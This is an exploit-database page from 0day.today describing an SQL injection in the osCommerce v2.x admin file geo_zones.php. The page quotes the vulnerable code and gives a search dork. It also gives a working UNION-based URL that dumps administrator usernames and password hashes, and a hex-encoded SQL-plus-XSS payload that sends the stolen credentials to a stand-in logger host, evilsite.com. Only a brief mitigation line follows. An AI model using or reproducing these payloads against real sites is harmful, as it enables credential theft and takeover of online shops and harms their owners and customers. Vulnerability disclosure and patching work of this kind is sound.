0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
osCommerce v2.x SQL Injection Vulnerability
# Title: osCommerce v2.x SQL Injection Vulnerability # Dork: Powered by osCommerce # Author: Ahmed Aboul-Ela # Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek # Vendor : http://www.oscommerce.com # Version: v2.3.3.4 (current latest release) and prior versions should be affected too - Vulnerable Code snippet in "catalog/admin/geo_zones.php": <?php [...] LINE 138: $rows = 0; LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified, a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . " c on a.zone_country_id = c.countries_id left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID'] . " order by association_id"; LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows); LINE 141: $zones_query = tep_db_query($zones_query_raw); [...] ?> As we can see at line 139 the GET zID parameter directly concatenated with the sql query without any type of sanitization which leads directly to sql injection vulnerability - Proof of Concept ( dump the admin username and password ): http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators -- - Exploitation & Attack Scenario: an authenticated admin account is required to successfully exploit the vulnerability but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack Example to steal the administrator username & password and send it to php logger at "http://evilsite.com/logger.php?log=[ADMIN USER:HASH]" We can use hybrid attack technique ( SQL Injection + XSS ) : http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators -- - Mitigation: The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now # 0day.today [2024-06-30] #